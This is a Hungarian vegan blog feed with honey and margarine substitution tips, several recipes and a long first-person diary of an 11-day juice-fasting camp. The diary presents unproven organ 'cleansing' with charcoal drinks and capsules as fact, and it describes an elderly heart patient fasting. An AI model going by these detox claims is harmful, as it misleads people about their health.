Orlich MJ, Singh P
Mézes-vajas kenyér helyett – rizsszirupos, margarinos kenyér
Ez nem egy recept bejegyzés, inkább arról szól, milyen szirupokat lehet venni méz helyett és hol kaphatóak, mitől lesz nem vegán egy margarin vagy egy kenyér. És persze nem utolsó sorban ez egy vegán reggeli ötlet. A szirupos-margarinos kenyér elkészítése nagyon egyszerű, megkenjük a kenyeret margarinnal, azt meglocsoljuk sziruppal. De az alapanyagok kiválasztása felvethet pár kérdést. Ne aggódj, nem annyira bonyolult, mint amilyen hosszú lett a cikk. A képen a világosabb színű szirup rizsből készült, simán megkentem margarinnal a kenyeret, és rányomtam a rizsszirupot. A sötétebb színű változat juharszirup. Óvodában úgy csinálták nekünk a “vajas-mézes” kenyeret, hogy összekeverték a mézet a margarinnal (gondolom, mert így nem csöpög és ragad annyira). A juharszirup hígabb, mint a rizsből készült társa, ezért ezzel próbáltam ki. Nem lehet teljesen simára keverni villával, de eléggé összeáll ahhoz, hogy fel tudtam kenni egy alapnak, és csurgattam még rá egy adag juharszirupot. Teljesen visszaadta az ovis emlékeket. Szirupok A méz nem vegán, erről itt írtunk. Jó helyettesítők a növényi szirupok. Az én kedvencem a rizsszirup, mert van valami tejszínes krémesség az ízében, miközben teljesen vegán, és Európában termeszthető alapanyagból készül. Az agavé szirup is finom, és rendkívül egészséges. Mivel többnyire Mexikóból származik, nagyobb az ökolábnyoma, mint a rizsszirupnak. A datolya szirup kevésbé elterjedt, de nagyon finom, mazsolára és karamellre emlékeztető íze van. A datolya közel-keleti gyümölcs. A kókusz szirup íze teljesen karamellás, egészen különleges. Ez előny és hátrány is egyben: ki lehet érezni az ételekből az ízét. Szintén távoli országok gyümölcse. A juharszirupot az amerikai filmekből mindenki ismeri, palacsintára locsolják literszám. Hígabb, mint a fenti szirupok. Füstös, kellemes íze van, nagyon finom. Szinte kizárólag Kanadából és az USÁból származik. Még sosem láttam boltban, de létezik a magyar almaszirup, mely nyilván kicsi ökolábnyomú alternatíva. Karamellás ízvilágért még választhatjuk a (szerintem kevésbé egészséges) nádmelaszt, azaz cukornád-szirupot. Margarinok Sajnos a margarinok többsége sem vegán. Ez itt nem a reklám helye, de az olcsóbbak közül a Liga margarin teljesen állati eredetű anyagoktól mentes, és a Rama is piacra dobta (elég drágán) a vegán margarinját. Más, reform üzletekben, vagy nagyáruházak reform részlegén kapható margarinok közt is találunk vegánt. Attól lesz nem vegán egy margarin, ha van benne – tejtermék (vaj, joghurt, író vagy írópor, laktóz stb.) – D3-vitamin (vagy lanolin) – állati zsiradék Fontos infó: a D2 vitamin növényi eredetű. A D3-vitamint (és a lanolint) viszont juhok gyapjából nyerik ki. Így a D2 vitamin vegán, de ha a D3-t látod a csomagoláson bármilyen terméknél, az sajnos juhok szenvedése árán került az ételbe. Tejsav vagy tejsavó: a tejsavat baktériumos erjesztéssel állítják elő, így vegán. A tejsavó azonban a tejnek az alkotóeleme, így nem vegán. Kenyérfélék A kenyérfélékben, pékárukban előfordulhat tej, tejpor, tejsavó, sajt, vaj (tejből készül!), tojás, tojáspor, állati zsíradék, tepertő, és persze az ízesített, töltött pékárukban még sok minden más. Szerencsére már minden kis- és nagyáruházban fel van tüntetve, ki van függesztve az allergéntáblázat, vagy rosszabb esetben a el lehet kérni az ügyfélszolgálattól. Vannak dolgok, amiket nem nagyon tudunk kivédeni, például az úgynevezett zsírsavak mono- és digliceridjeit, amit többnyire növényi alapanyagokból állítanak elő, de nem kizárható sajnos az állati zsír használata. Mindenki magának dönti el, hogy ez a kockázat belefér-e számára. Kenyeret gluténmentes változatban is vehetünk, vagy helyettesíthető puffasztott kukoricaszelettel (más néven abonettel). The post Mézes-vajas kenyér helyett – rizsszirupos, margarinos kenyér appeared first on VegaNinja.
Fűszeres csicseriborsó nasi
Főétel mellé, vendégvárónak, vagy filmezéskor ropogtatva egyaránt nagyon jó választás a fűszeres, ropogós csicseriborsó “csipsz”. Egyszerűen elkészíthető sütőben. Hozzávalók: 1 nagy konzerv csicseriborsó 1 evőkanál fűszerkeverék (később kifejtem) Elkészítés: alaposan csöpögtessük le a csicseriborsót egy szűrő segítségével, majd egy nagy tálba téve forgassuk össze a fűszerekkel úgy, hogy egyformán fűszeresek legyenek. Majd sütőpapíron, tepsiben terítsük szét őket, és (ha lehet, légkeveréses) sütőben, alacsony hőfokon, kb. 150 fokon süssük fél óráig úgy, hogy kb. 10 percenként kicsit átkevergetjük őket. Fűszerezési ötletek: Ha nem szereted a bolti fűszerkeverékeket, az alábbi kombinációk nagyon finomak. - só, gyömbér és fokhagymagranulátum - só, pici cukor, pirospaprika, fokhagymagranulátum, bors, kömény, majoránna, vöröshagymapor – magyaros jellegű lesz belőle - só, kakukkű, oregano, bazsalikom - vegán tejpor, sörélesztőpehely, só, szárított metélőhagyma (lehetőleg porrá őrölve mozsárban) – hagymás-tejfölös feeling lesz belőle - só, pici cukor, pirospaprika, fokhagymagranulátum, bors, gyömbér, szerecsendió, tárkony, vöröshagymapor - paradicsompor, hagymapor, fokhagymapor, bazsalikom, pici cukor – olaszos feeling lesz belőle The post Fűszeres csicseriborsó nasi appeared first on VegaNinja.
Rakott kel
Karácsonyi akció részleteiért KATT IDE Vannak időszakok amikor annyira kívánom a kelkáposztát, nem tudok betelni vele. Aztán van olyan is, hogy eszembe se jut. Imádom a nyári változatát, amelyik szinte olyan laza, mint egy fejes saláta, sok gyönyörű mélyzöld levéllel. A télit sokkal nehezebb szétszedni, de a levelek között megbújnak a vízcseppek, és ahogy a kezemre hull, mintha egy titkos világba pillanthatnék be. :) Szóval, elhatároztam, hogy csinálok egy rakott kelt. Szója granulátumos vagy lencsés volt az első ötletem, de aztán gondoltam egyet, és végül az enyémbe most nem tettem egyiket sem. Helyette rizst főztem meg extra ízes, fűszeres szószban, lefőztem a levét, így a szemek beitták az összes ízt. Ez lett a töltelék, és ilyen fantasztikus rizsrétegek között párolódott a káposzta, és sült rá a tetejére a gyönyörű, aranyló öntet. Hozzávalók egy közepes sütőtálhoz, 3-4 adagra - egy fél kelkáposzta levelei - 100 g barnarizs (célszerű az előgőzölt) - 1 ek szárított zöldségkeverék (bio ételízesítő) - 2 ek szójaszósz (elhagyható, de nem bánod meg!) - 1 fej vöröshagyma - 2 kk pirospaprika - 1 nagy gerezd fokhagyma - 1 mk őrölt köménymag - olaj - 2 dl (növényi) joghurt vagy (növényi) tejszín - 1 mk kurkuma és 1 mk pirospaprika - Először készíts egy jó kis magyaros alapot a rizsnek. Ehhez vágd apróra a hagymákat, és az olajon a vöröshagymát párold üvegesre, majd dobd bele kis időre a fokhagymát is. További 1-2 percet hagyd a tűzön, utána húzd le róla. Jöhetnek a fűszerek: pirospaprika, kömény, a szárított zöldségkeverék. Ha teszel bele szójaszószt, az is itt következik. - Ebbe az alapba öntsd a rizst és bő vízzel főzd meg. Az a cél, hogy a víz kb. elfőjön, mire megpuhul a rizs. Amíg elkészül, mosd meg a kelkáposzta leveleit. - Állíts össze a rakottadat: a sütőformában fektesd le rétegesen a káposztát és a rizst. Alulra és legfelülre kelkáposztalevél kerüljön, és készíts legalább két emeletet. - A joghurtban keverd el a kurkumát és két mokkáskanál pirospaprikát, ettől lesz szép színe. Szükség szerint hígítsd fel kis vízzel, és kend rá a rakott tetejére, majd mehet is a sütőbe. - 180 fokon 60 perc alatt készre sül, de tálalás előtt érdemes hűlni hagyni kicsit. Jó étvágyat! Elkészítési idő: 70 perc Ez egy vegán recept volt. :) Hasonló recepteket ITT találsz még. Ha itt feliratkozol, a legújabbakat mindig frissen kapod majd a postaládádba. :) Nézd meg a legújabb Kertkonyha főzőtanfolyamokat! Kezdő Vegán Vegán MUST HAVE - a kötelező alapcsomag Növényi Tejek és Tejtermékek I Növényi Tejtermékek II A Mindennapi Superfood Kezdő Vegán Angol nyelven Karácsonyi akció részleteiért KATT IDE The post Rakott kel appeared first on Kertkonyha.
Ingyen kap gyümölcsöt, aki arra jár - lesz belőle magyar módi?
Növessz te is zöld bajuszt! – kampány a zöldturmixok népszerűsítéséért + recept
2018. szeptember 17. VegaNinja
Szeretném felhívni a figyelmedet egy remek kezdeményezésre, ami egy anyukától, Geosics Reginától, a Feminie.hu blog írójától indult, aki elkötelezett híve a tiszta, növényi táplálkozásnak. Regina ötletét felkarolta a Magyar Vegán Egyesület, Magyarvári Szilvi dietetikussal és Gacsó Anikóval (MAVEG alelnök) együtt létrehozták a ZÖLDBAJUSZ kampányt. A Zöldbajusz arra sarkall kicsiket és nagyokat, növesszenek minél sűrűbben zöld bajuszt, azaz fogyasszanak rendszeresen zöldturmixot. Ebben kívánnak segíteni kihívásokkal, hasznos információkkal, előadásokkal, fotópályázattal és zöldturmix receptekkel. Csatlakozzatok Ti is a @zoldbajusz kezdeményezéshez, kövessétek az oldalt Facebookon és Instagramon is, és vegyetek részt a fotópályázaton szeptember 25-ig az értékes ajándékokért! További részletek és fotóbeküldés: www.maveg.hu/zoldbajusz Recept Én egy spenótos-bazsalikomos-citromfüves-gyömbéres almaturmixszal nevezek, a receptje ez alapján könnyen kitalálható. A fűszernövények a balkonládámból származnak, az alma szüleim kertjéből. 3 zöld alma egy marék friss bazsalikom egy ág citromfű egy nagy marék bébispenót egy ujjnyi gyömbér víz Ízlés szerint tehető még bele 1-2 banán, kurkuma és fekete bors is (ez utóbbi azért, hogy a kurkuma jobban kifejtse hatását). A hozzávalókat összeturmixoltam, és kész is. A gyömbér élénkít, a kurkuma rengetegféle jótékony hatással bír, többek között támogatja az ízületek jóllétét. The post Növessz te is zöld bajuszt! – kampány a zöldturmixok népszerűsítéséért + recept appeared first on VegaNinja.
Nyers tökfőzelék
Amikor elkészítettem és megkóstoltam, hangosan kimondtam: "Minek főztem eddig, ha nyersen is nagyon finom?" Persze az fontos, hogy zsenge tökből kell készíteni. Angliában nem jellemző a fehér nyári tök, viszont annál inkább a marrow nevü, ízben teljesen a töknek megfelelő zöldség. A magyar nyári tökökhöz képest egy különbség van: nem fehér, hanem sötétzöld és fehér csíkos. Belül ugyanúgy magjai vannak, a húsa egy az egyben olyan, mint a közönséges nyári töknek. Én ezt használtam, de ha nyári tök is elterjedt lett volna, biztos, hogy azt veszem, ügyelve arra, hogy zsenge legyen. Nyári tök esetében a kisebb darabokat ajánlom, nem a több kilót is nyomó pédányokat. Valamint érdemes megvizsgálni, hogy a héja kemény vagy puha. Ha könnyen belenyomjuk a körmünket a héjába, átment a teszten, jöhet a kosárba, vagy hozhatjuk a kertünkből. Jó, ha a szára minél élénkebb színű, ez szintén jelzi, hogy zsenge tökkel van dolgunk. A recept Hozzávalók: - 1 nagyobb vagy 2 kisebb zsenge tök - 1 csomag kapor - 2-3 gerezd fokhagyma - 1/2 citrom leve - só - 1 bögre (2-2,5dl) olajos mag (dió, kesudió, napraforgó, mogyoró - ami épp van otthon ezek közül) - fűszer paprika (azoknak, kik paprikásan szokták enni) Elkészítés: Az olaj magot beáztatjuk annyi kézmeleg vízbe, hogy épp ellepje. A tököt meghámozzuk, kettévágjuk hosszában, a magjait kiszedjük, külön tesszük és a két fél tököt nagy lyukú reszelőn lereszeljük. Az olajos magokról leöntjük a vizet, ha koszos (napraforgónál koszos lehet) a turmix gépbe tesszük, egy kevés vízzel elkezdjük turmixolni, majd hozzáadagoljuk a zsenge tökmagokat. Krémes állagura turmixoljuk. Turmixolás közben hozzáadjuk a fokhagymát, a kapor egy kisebb részét, citrom levét, sót, illetve akik paprikásan eszik, fűszer paprikát is szórhatnak bele. Tejfölszerű állagot kell kapjunk. A lereszelt tököt ezzel összekeverjük például egy üveg edényben. A tetejét megszórjuk apróra vágott kaporral. Ízlés szerint aprított újhagymát is szórhatunk a tetejére. Fogyasztás előtt egy kevés hidegen sajtolt tökmag olajat is tehetünk a tányérunkban lévő tökfőzelékre.
Gondolatok az Anyaságról – Szoptatás
2018. augusztus 16. Zizi kalandjai
Most, hogy a #normalizebreastfeeding hashtag ennyire népszerű és a Szoptatás Világhete esemény is a napokban ért véget (augusztus 1-7-ig tartott, magyarul itt olvashattok róla), meg már sokan kértétek tőlem ez a témát, arra gondoltam, hogy megírom az én szoptatási történetemet, hogy inspiráljak olyan anyukákat, leendő anyákat, akiknek szintén nehezen indul(t) a szoptatás, ahogyan nekem néhány... Source
Léböjt táborban jártam...
Egy hely, ahol különböző levek ivása mellett nem viszel be szilárd táplálékot, még gyümölcsöt és zöldséget sem eszel, nem rágsz semmit, és még sem vagy igazán éhes. Ez a hely az a léböjt tábor, amely a szerbiai Fekete-tó (Crna Bara) nevü településen került megrendezésre immáron sokadik alkalommal, nekem és férjemnek azonban életünk első léböjt tábora volt. Crna Bara a falucska és a tábor, a szegénységhez közel, mégis gyümölcsözönben és emberi szeretetben bővölködő. Itt végre a civilizáció és annak ártalmai kevésbé vannak jelen, nem mérgezik a mindennapi életet. Egy hely, ahol az emberek egyszerűbben élnek, ruházkodnak, beszélnek, gondolkodnak és van értéke a kétkezi munkának, ahol a konyhakert adja az évi élelem egy nagyobb részét. Ez az a hely, ahol az ember csendben visszavonulhat, megpihenhet, feltöltődhet és új embereket ismerhet meg, gazdagodhat mások élettörténetei, tapasztalatai által. A jelenlévő 20-25 táborozóból csak négyen voltunk, akik először jártunk itt, mert ide az emberek visszajárnak Magyarországról, Németországból, Horvátországból. Felújított, régi vályogházakban egyszerű körülmények között szállásolnak el bennünket. A lé-kínálat gazdag (korlátlan) és sokfajta, köszönhetően a környékbeli gyümölcsfáknak, kerteknek és dinnyeföldeknek. Bátran állítom, a tábor felülmúlta várakozásainkat annak ellenére, hogy még sok fejlesztendő területe van. Szívesen visszamennénk. Csendben belopta magát a szívünkbe. Vese-, máj- és béltisztítással egybekötött léböjt tábor volt ez, ahol a béltisztítás két illetve három különböző formulával történt. Az egyik, amit napjában többször ittunk, az általunk "fekete-leves"-nek hívott aktív szén alapú por vízzel hígított itala. Ez nem csupán aktív szenet tartalmazott, hanem más egyéb dolgokat is. 1 kiskanálnyi port kb. 1.5 dl vízzel összeráztunk kis befőttes üvegben, majd mielőbb megittuk. Akik erre még ittak vizet, helyesen tették. Ez a fekete-leves a gyomorban besűrűsödött. A béltszitításhoz ezen kívül még 2 különböző kapszulát is szedtünk. Várakozással telve mentünk el ebbe a kis falucskába, nem tudva pontosan, milyen lesz a böjt, nehéz, vagy könnyű, de Eleken való évekkel ezelőtti részvételünk miatt is vágytunk arra, hogy megerősítsük immunrendszerünket, feltöltsük szervezetünket sok-sok enzimmel és az angliai életből fakadó rossz szokásoktól valamelyest könnyebb legyen megszabadulni, egy új kezdethez alapot kapni. Szervezők ajánlották, hogy az érkezés előtti napokban 80%-ban igyekezzünk nyers ételeket fogyasztani. Igyekeztünk, készítettem is nyers kenyeret és egyéb nyers ételeket, de nem kizárólagosan fogyasztottunk nyerset ekkor. A vesetisztítás a 2-6. napban reggeli és esti teával valamint csilis-citromos limonádéval történt. Egy aprónyi mellékhatásaként a veséim tisztulásának következtében az arcbőröm reggel-este zsírosabb volt a szokásosnál (inkább száraz vagy normál az arcbőröm). Kisebb pattanások jöttek ki a hajamhoz közel körben a homlokomnál és a halántékomon. Nem nagyon foglalkoztam vele, mivel nem volt erősen zavaró egyik sem és tudtam, ha a léböjtnek vége, ezek mind elmúlnak. Így is lett. Májtisztítás pedig a 7-11. napban történt májtisztító teával valamint grapefruit-os, fokhagymás, gyömbéres itallal. Az egyik kapszulát már nem kellett szedni. Mellékhatásként nem tudom, hogy a már 5 napja tartó böjt hatásaként vagy a májtisztítás miatt jelent-e meg, de a nyelvem már nagyon lepedékes lett. (Elvégre is a rágás hiányzott a napjainkból.) Fogkefe-fogkrém páros még gyakrabb használatával orvosoltam. A következőkben beszámolok arról, melyik napon mi történt és hogyan éltem meg a léböjtöt. 1. nap Belgrádból érkeztünk a táborba, egy helyi ember jött értünk és hozott el minket, mivel távolsági közlekedés nem a legjobb az országban. Az út Belgrádból kevesebb, mint 3 óra volt, nem autópályán, így láthattuk az ország bizonyos tájait. Megérkezés után elfoglalhattuk szállásunkat, majd a regisztrációs lap kitöltése után vérnyomás, vércukor és testtömeg mérés következett. Megérkezés napján mindenki dinnyét kapott vacsorára. Mondhatnám ALL YOU CAN EAT DINNYE (Amennyi csak beléd fér dinnye.) Meglehetősen kedvemre való volt, hiszen reggel már sikerült Belgrádban is felvágnom egy dinnyét és élvezettel fogyasztottam, mivel Angliában az édes, piros belsejű dinnye ritka. (Volt már idén részem édes dinnyében Angliában, de egy kezemmel meg tudom számolni, hányszor.) Dinnye után kb. 1-2 órával 2 különböző kapszula bevétele következett, amelyek a béltisztításért felelősek. A léböjt tábor nem lenne igazi, ha a testi bajok gyógyítása mellett a lelki egészségre ne figyelne. Lelki táplálékként előadás 10-15 percben, majd hamarosan takarodó, 9 órakkor. Korainak találják egyesek a takarodó idejét, de emlékeztetnek arra, hogy az éjfél előtti alvás duplán számít, többet ér, mint az éjfél utáni. Nehezen alszom el. 2. nap Ébredés 5.30 körül, kissé nehezen kelek, de egész nap energiadús vagyok. A reggeli tisztálkodást vízivás és béltisztító formula (fekete leves) bevétele követi 6 órakor, majd fél 7-kor közös reggeli torna a füvön. Szép időre ébredtünk, jól esik a reggeli torna is. Tornát követően citromos csilis shake-t ittunk, majd lelki táplálék a reggeli gondolatokkal, amit a tea követett. Napközben pedig jött a dinnyelé, paradicsomlé, zöldséglé (ezen a napon céklalé), káliumleves és tea zárta a sort. Szuper, hogy nem volt korlátozva mennyit ihatsz. Dinnyeléből le is ment legalább 1 liter. A napi ivászatokat tornával, sétákkal, kirándulással, egészségügyi előadásokkal és rövid csendes pihenőkkel tettük változatossá. Zöldségléként a céklalé, ahogy arra számítottam, enyhe hányingert okozott. Ez tipikus, mivel volt már máskor is, amikor otthon próbáltam natúr cékla levet inni. Bár tettem bele pár csepp fokhagymalét, de nem segített. Maga a cékla leve marta a torkom, hiába ittam rá utána bőséggel vizet. Pár óra múlva jött a káliumleves (az egyetlen nem nyers alapú lé, mivel zöldségleves sómentesen, átszűrve a zöldségektől, csak maga a lé), ami a hányingeremet helyre tette valamelyest, ezért az esti tea után ismét ittam káliumlevest. Így teljesen normalizálódott a gyomrom, nem volt már estére hányingerem. A 9 órási takarodó sem okozott gondot. 3. nap Ismét kellő energiával ébredtem. Székletem is volt már kora reggel, ébredést követően, annak ellenére, hogy nem eszünk, csak iszunk. Jól esett a reggeli torna. Nem kivántam mást csak vizet inni, azért a reggeli csilis limonádéval megpróbálkoztam, kb. 3 dl tudtam meginni ezen a reggelen. Dél körül f utni mentem, mert hiányzott az aktivabb mozgás. Sajnos a nagy meleg miatt nem ment tovább csak kb. 15 percig. Így visszatértem, lezuhanyoztam, ami jól esett nagyon. A reggeli 3 pohár szilva hajtó hatása miatt inkább nem mentem el kirándulni a csapattal óvatosságból, de nem volt végül semmi bajom a közel 1,3 liter szilvalétől. :) Délután uborkából és paradicsom készült a lé, ami különben egész jól esett. Nem fűszereztem se petrezselyem, se fokhagyma, se csili lével. Lágy volt, mintha símogatna. 4. nap Enyhe izomláz éreztette magát a végtagjaimban a reggeli torna és a futás eredményeként. Ezen a napon masszázst kaptam, ami nagyon jól esett. Egyik néni 47%-os szívmüködéssel nehezen bírta a böjtöt, a gyomra miatt. Törődtünk vele, bátorítottuk. Gyömbéres levet kapott, ami a gyomrát segíti. Míg egy másik fiú (36) cukorfüggősége depresszióba csapott át, így megoldásként a konzultációt követően dinnyét evett. Ő különben Dél-Szerbiából biciklivel jött. Több száz kilométert tett meg kétkeréken. Beszél angolul, németül, szerbül és tanulgatott a táborban magyarul. Fogékony a nyelvekre. Mi angolul beszélgetünk vele. Sárga és görögdinnye lé aranyozta be a napunkat. Később pedig a cé kla almával már lágyabb és jobb, nem is okozott gyomorpanaszt mint a csak cékla a korábbiakban. Káliumleveshez délután tettem fokhagymás lét, petrezselymes lét és csiliből egy keveset, így kicsit átverem az agyam, mivel hiányzik a só íze a levesből. 5. nap Minden rendben volt a mai napon. Jókat beszélgettünk a táborzó emberekkel. Szilva-alma a délelőtti édes ital, majd cukkini-tök lé, azután pedig paradicsom hagymával lé. Mindegyik nagyon ízlik. A néni feladta estefelé a böjtöt. Elgyengült teljesen. Azt gondolom az Ő korában (70+) és a szívének állapotában ez nagyszerű eredmény elsőre, különösen, hogy szívbetegeknek nem igazán ajánlják a léböjt tábort. Dinnyét kapott, mint az átállás 1. lépése. Egészségügyi előadás keretében a Hunzákról volt szó, amit igen érdeklődve hallgattam. Egy nép, akik sokáig élnek és nehéz megközelíteni őket a magas hegyormok miatt. Híresek a gyümölcsaszalásról is. Saját maguknak aszalják a hidegebb hónapokra a barackot és más gyümölcsöket is. Elalváskor nyugtáztam magamban, hogy a tábor felén túl vagyunk és semmi problémám. Se éhségérzetem, se erős hasmenésem. Minden normális. 6. nap Ma pihenő- és nyugalomnapra ébredtünk a táborba, így 1 órával később kelhettünk, nem 5.30-kor. A korábbi ébredést könnyen megszokta a szervezetem, így 6 előtt ébredtem, de pihengettem tovább. Nagyon paprikás citromlé fogadott reggel, mint az utolsó vesetisztító shake. Szerencsére röviddel ezután a d innyelé jó édes volt, le is csúszott 2.5 pohárral. :) Cukkini sötétzöld színben igazán finom volt petrezselyemmel. Este a nyugalomnap zárás kicsit hosszabbra sikeredett, már nem bírtam végigülni, így korábban kijöttem és visszavonultam a szobánkba, ahol élveztem a csöndet és a nyugalmat. Olvasgattam egy könyvet is. 7. nap A nyugalomnap következtében sokkal pihentebb voltam, így az 5.30-kor esedékes ébresztő előtt már könnyedén felserkentem. Örültem, hogy végre fel tudok kelni az ébresztő előtt és futni menni. Nem vittem túlzásba, a mobilom szerint 1.6 km sikeredett reggeli futasként. Jólesően leizzadtam tőle, így igazán remekül esett a zuhanyzás utána. Egész nap örömmel töltött el, hogy futással kezdtem reggel. Bárcsak a következő reggel is időben ébrednék és kelnék hozzá. A reggeli shake és a tea új volt ettől a naptól kezdve, mivel már májtisztítás vette kezdetét. A shake citromfélékből, gyömbérből és fokhagymából készült. Jobban izlik, mint a vese shake, de csak 1 pohárral merek inni belőle, mert elhangzott, hogy annyi teát kell inni majd, amennyit a shake-ből iszunk, hogy az epehólyag jól működjön. A tea ízére pedig hallottam pár keserűbb véleményt a visszatérő táborozók közül. Megittam a teából is a fél literemet később, de nem volt vészes íze. Oké, nem a legfinomabb gyógytea, de ennél rosszabb ízű teák is vannak. Sajnos 3 résztvevő csak 1 hétre tudott jönni, így tőlük a fincsi szilvalé után elbúcsúzunk. Sajnálom, hogy menniük kellett, mert jókat tudtunk beszélgetni mindegyikőjükkel, főleg, hogy a férfi egykor atomfizikus pályára készült, a férjem pedig fizikusnak egy időben, de végül mindketten az emberek "szolgálatában" kötöttek ki, így igazán sok közös témájuk volt. Délután kaptam egy jó, 50 perces masszázst, ami még jobban segíti a böjt általi anyagcserémet. Mint megtudtam, az egészségügyi előadó kedden reggel haza kell, hogy utazzon. (Ő amúgy sem csinálta a léböjtöt, mivel az utóbbi időben édesapját is gondozta, plusz egy nagy házat, kerttel rendbe kell tartania, talán ezen okokból is nagyon lesoványodva érkezett. Régebbről ismerem őt, hiszen az egyik munkahelyemen én lettem az utóda.) A szervezők megkértek (miután időközben kiderült, hogy én vagyok a Vegalife.blog.hu írója), hogy kedden tartsak "receptklub"-ot olyan nyers és turmix receptekből, amik ötletet és segítséget adnak a böjt utáni átállásra. Míg férjem és a többiek egy része elment úszni a közeli tóra, én megpróbáltam összeállítani a recepteket. A délutáni káliumleves nagyon fini volt, nem tettem bele semmi plusz ízesítőt. Az esti májtea jobban esett mint reggel. 8. nap Sikerült! Automatikusan felébredtem korábban, így 2.3 km reggeli futás össze is jött az ébredező falu utcáin. Napközben megtartottam az egészségügyi előadást a receptjeim és a hozzá tartozó hasznos tudnivalók kapcsán. Jól sikerült. Már egy ideje nem is figyeltem, de ma eszembe jutott, és meglepve tapasztaltam, hogy nem zsíros a bőröm. Vesetea alatt végig az volt. Köszönhető a béltisztító kapszuláknak és a fekete levesnek, minden nap simán van székletünk. Délután fél órában vacuum masszázst kaptam a combjaimra, elősegítve az ottani anyagcserét. Nagyon szuper volt! 9. nap Fel voltam villanyozva, mert ma végre nem lovaskocsi program és tóban úszás várt ránk, hanem termálfürdő!!!! :) (Angliában erre nincs lehetőségem, így külön öröm számomra.) Ugyanakkor valamiféle gyenge holtpontom ez a nap. Hiányzott az evés, ma először, mégha iható es sokszor finom leveket kapunk. Talán azért is, mert a termálfürdőben megcsapott a sült krumpli illata. A táborban nem volt nehéz elviselni a leves illatát, amikor főzték, de kikerülve a táborból, a megcsapott étel beindította a nyáltermelődésem annak ellenére, hogy a sült krumpli nem a kedvenc ételem egyátalán. Mindenesetre a termálfürdő úszómedencéjében sikerült 1.1 km-t úsznom, majd áztattam magam, beszélgettem a többiekkel. Persze mi másról, ha nem kajákról, csak hogy kínozzuk magunkat :) Férjemmel arról is beszéltünk, mikor fogunk legközelebb pizzát enni. (Ami nagy kedvence.) Este fél 8kor éreztem, hogy üres a gyomrom, igaz nem ittam fekete levest 2 óra után, csak zöldséglevest és kevés teát. A fekete leves pedig mindig segített eltelíteni. Nagyon kívántam a barack húsába harapást, a ropogós dinnye evését, de a böjt mellett kitartottam, mivel tudom, már alig van hátra valami a táborból és a léböjtből. 10. nap 4.45-kor ébredtem magamtól. Ma is tartottam egy másik előadást, amire szintén felkértek. A csendes reggelt arra használtam, hogy készültem rá, mivel az 7.30-kor kezdődött. Élveztem, hogy mások még szenderegnek, én már ébren vagyok és hallgatom a csendet. A tegnapi úszás nagyon jól esett, a mai napra a zentai piac meglátogatása volt a program. Mi is elmentünk. Ott aztán kívántam volna a sok fini gyümölcsöt és zöldséget, de nem szenvedtem tőle. Délután orvosi méreckedést követően pár kilóval kevesebb voltam, vérnyomásom picit alacsonyabb a kezdetinél. Kihagytam direkt a paradicsom levet. Már nem szerettem volna inni csak vizet. Mindössze fé l pohár káliumleves után várom az esti teát. Táborzárás délután, mivel újabb 4 embernek kellett hazamennie. Vacuum m asszázst kaptam este megint. Szuper jó volt! 11. nap A búcsú napja. Ma mindenki befejezte a tábort. Reggel fekete-leves, majd shake, tea. (Ez utóbbi kettőből most 1,5 pohárral ittam). A levek után 2 órával végre az jöhetett, amit annyira vártam: felvágtam egy dinnyét, szépen ropogott, reccsent, mintha csak arra várt volna, mikor vágjuk meg. Kánaááán! :) Mézédes dinnye! Mértékkel ettem belőle, de tudtam, mielőtt elhagyom a tábort, még egyszer fogok belőle enni. A dinnye után 2 óra múlva ittam egy kis alma-őszibarack gyümilevet, majd bő fél óra múlva nagyon édes szilvából ettem és indulás előtt 1 órával ismét dinnyével laktam jól. A repülőútra csomagoltam a szilvából és 4 szem barackot is. Repülőre szállás előtt 2-2 szem barack a délelőtti gyümölcsözön után és ezzel be is fejeztük a napi evést. Szerencsés hazaérést követően éjfél után aludtunk el. Reggel 6 körül azonban mindketten automatikusan keltünk. (Szerbiában az 7 óra.) Itthon A nyers étkezést folytatjuk gyümölcsökkel az átállás jegyében. Férjem már várta, hogy mikor ehet párolt zöldséget, de megvárta, míg az átállás programja ezt lehetővé tette. Igen, itthon, különösen Angliában a finom dinnye hiányában nehezebben megy az átállást tartani. De azért tesszük a tőlünk telhető legtöbbet és fokozatosan hozzuk vissza a zöldségféléket, magvakat. Gabonát még nem eszünk, de néhány napon belül az is bekövetkezik. Mindketten úgy gondoljuk, hogy amíg csak bírjuk, minél több nyers ételt fogyasztunk. A béltisztításnak, úgy mint máj- és vesetisztításnak is már vége, így most probiotikumot szedünk, hogy felépítsük vele a helyes bélműködést, ami a tisztítás követően nagyon szükséges. Prebiotikumokat pedig a zöldségek, gyümölcsök által sikerül. Igyekszem elhúzni az idejét annak, hogy bármi tésztát, vagy glutén tartalmú ételt magunkhoz vegyünk. Nem mintha bármelyikünk is gluténérzékeny lenne, hanem télen úgyis annyira jelen van a mindennapjainkban, hogy ez a léböjt egy új kezdetet kínált számunkra, amikor a lehető leghosszabb ideig igyekszünk pizzát, kenyeret, tésztát és társait nem enni. A táborra visszatérve, azt gondoltam, nehezebb lesz. Néhány táborozót kicsit meglepett, hogy nincs fejfájásunk, rosszul létünk, semmi nagyobb problémánk a böjtből fakadóan. Ami azért kevésbé lepett meg minket, hiszen tábortól függetlenül is igyekeztünk egészségesen étkezni, élni. Mi már régóta nem eszünk húst, míg jó néhány táborozó úgy érkezett, hogy még a tábort megelőző hétvégén is húst fogyasztott. Az alvásigényem még mindig alacsonyabb. Ma is nagyon korán ébredtem (5 óra körül), így a reggeli pirkadatot is ki tudtam használni arra, hogy befejezzem a léböjt tábori tapasztalataim. Férjemmel évek óta beszéltünk arról, hogy jó lene egyszer elmenni egy léböjt táborba. Most végre összejött. Igaz, hogy nagy távolságot kellett legyőzni érte, de megérte a tapasztalatért és az egészségért. Crna Bara-n tervben van egy szeptemberi léböjt tábor is még idén, 2018-ban, ami megfelelő jelentkezési létszám esetén el is indul. Ha bővebben szeretnél a részletekről tájékozódni, az alábbi e-mail címen kaphatsz tájékoztatást: nemeta@tippnet.rs
Vegán életmód – Vegán Doboz 3.
2018. augusztus 2. Zizi kalandjai
Egy újabb Vegán Doboz bejegyzés, amely szintén izgalmas volt a tartalmát illetően. Ha valaki nem ismerné, hogy mi a Vegán Doboz, annak röviden három mondatban: ez egy zsákbamacska doboz szolgáltatás, amelyre elő lehet fizetni havi, negyedéves, féléves vagy éves bontásban. Vegán termékeket, főleg magyar termelők, cégek által készített dolgokat összepakolnak egy dobozba és minden hónapban... Source
Vegán pecsenyezsír recept – kenyérre vagy sütéshez egyaránt felhasználható
